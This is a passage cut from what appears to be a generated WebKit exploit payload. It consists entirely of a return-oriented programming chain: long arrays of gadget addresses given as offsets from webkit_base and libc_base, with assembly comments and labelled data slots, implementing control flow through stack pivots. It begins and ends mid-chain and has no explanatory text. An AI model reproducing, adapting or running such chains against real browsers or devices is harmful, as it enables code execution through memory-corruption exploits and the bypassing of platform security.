ropchain+232192, //L4134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4134:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+232328, //L4138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+232312, //L4137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4136:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4137:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4138:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+232448, //L4141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+232416, //L4139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4139:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4140:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4141:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+232584, //L4143
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+232600, //L4144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+232568, //L4142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4142:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4143:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4144:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+232760, //L4149
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+232776, //L4150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+232712, //L4146
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4146:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4147:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4148:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4149:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4150:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+232888, //L4151+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+232880, //L4151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4151:
db([0, 0]); // 0x0
set_gadgets([
ropchain+232904, //L4151+24
ropchain+233304, //L4145
libc_base+764760, //pop rsi
ropchain+232944, //L4152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4152:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4154:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+233064, //L4157
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+233048, //L4155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4155:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4157:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+233208, //L4160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+233224, //L4161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+233176, //L4158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4158:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4159:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4160:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4161:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+233296, //L4162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4162:
db([0, 0]); // 0x0
//L4145:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+233424, //L4165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+233440, //L4166
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+233408, //L4164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4164:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4165:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4166:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+233600, //L4171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+233616, //L4172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+233552, //L4168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4168:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4169:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4170:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4171:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4172:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+233728, //L4173+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+233720, //L4173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4173:
db([0, 0]); // 0x0
set_gadgets([
ropchain+233744, //L4173+24
ropchain+236960, //L4167
libc_base+764760, //pop rsi
ropchain+233784, //L4174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4174:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4176:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+233904, //L4179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+233888, //L4177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4177:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4179:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+234048, //L4182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+234016, //L4180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+234032, //L4181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4180:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4181:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4182:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+234128, //L4183
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4183:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4185:
db([80, 0]); // 0x50
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+234248, //L4188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+234232, //L4186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4186:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4188:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+234424, //L4191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+234440, //L4192
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+234392, //L4189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+234408, //L4190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4189:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4190:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4191:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4192:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+234600, //L4196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+234568, //L4194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+234584, //L4195
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4193:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4194:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4195:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4196:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+234688, //L4197
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+234704, //L4198
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4197:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4198:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+234872, //L4200
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+234888, //L4201
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+234856, //L4199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4199:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4200:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4201:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+235048, //L4206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+235064, //L4207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+235000, //L4203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4203:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4204:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4205:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L4206:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4207:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+235184, //L4208+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+235176, //L4208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4208:
db([0, 0]); // 0x0
set_gadgets([
ropchain+235200, //L4208+24
ropchain+236584, //L4202
libc_base+764760, //pop rsi
ropchain+235240, //L4209
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4209:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4211:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+235360, //L4214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+235344, //L4212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4212:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4214:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+235504, //L4217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+235472, //L4215
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+235488, //L4216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4215:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4216:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4217:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+235584, //L4218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4218:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4220:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+235704, //L4223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+235688, //L4221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4221:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4223:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+235880, //L4226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+235896, //L4227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+235848, //L4224
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+235864, //L4225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4224:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4225:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4226:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4227:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+236056, //L4231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+236024, //L4229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+236040, //L4230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4228:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4229:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4230:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4231:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+236144, //L4232
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+236160, //L4233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4232:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4233:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+236328, //L4235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+236344, //L4236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+236312, //L4234
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4234:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4235:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4236:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+236488, //L4239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+236504, //L4240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+236456, //L4237
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4237:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4238:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4239:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4240:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+236576, //L4241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4241:
db([0, 0]); // 0x0
//L4202:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+236704, //L4244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+236720, //L4245
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+236688, //L4243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4243:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4244:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4245:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+236864, //L4248
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+236880, //L4249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+236832, //L4246
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4246:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4247:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4248:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4249:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+236952, //L4250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4250:
db([0, 0]); // 0x0
//L4167:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+237080, //L4253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+237096, //L4254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+237064, //L4252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4252:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4253:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4254:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+237208, //L4256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+237256, //L4259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+237224, //L4257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4256:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4257:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4258:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4259:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+237368, //L4260+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+237360, //L4260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4260:
db([0, 0]); // 0x0
set_gadgets([
ropchain+237384, //L4260+24
ropchain+240664, //L4255
libc_base+764760, //pop rsi
ropchain+237424, //L4261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4261:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4263:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+237544, //L4266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+237528, //L4264
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4264:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4266:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+237688, //L4269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+237656, //L4267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+237672, //L4268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4267:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4268:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4269:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+237776, //L4271
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4270:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L4271:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+237832, //L4272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4272:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4274:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+237912, //L4276
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4276:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+237992, //L4277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4277:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4279:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+238112, //L4282
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+238096, //L4280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4280:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4282:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+238272, //L4287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+238288, //L4288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
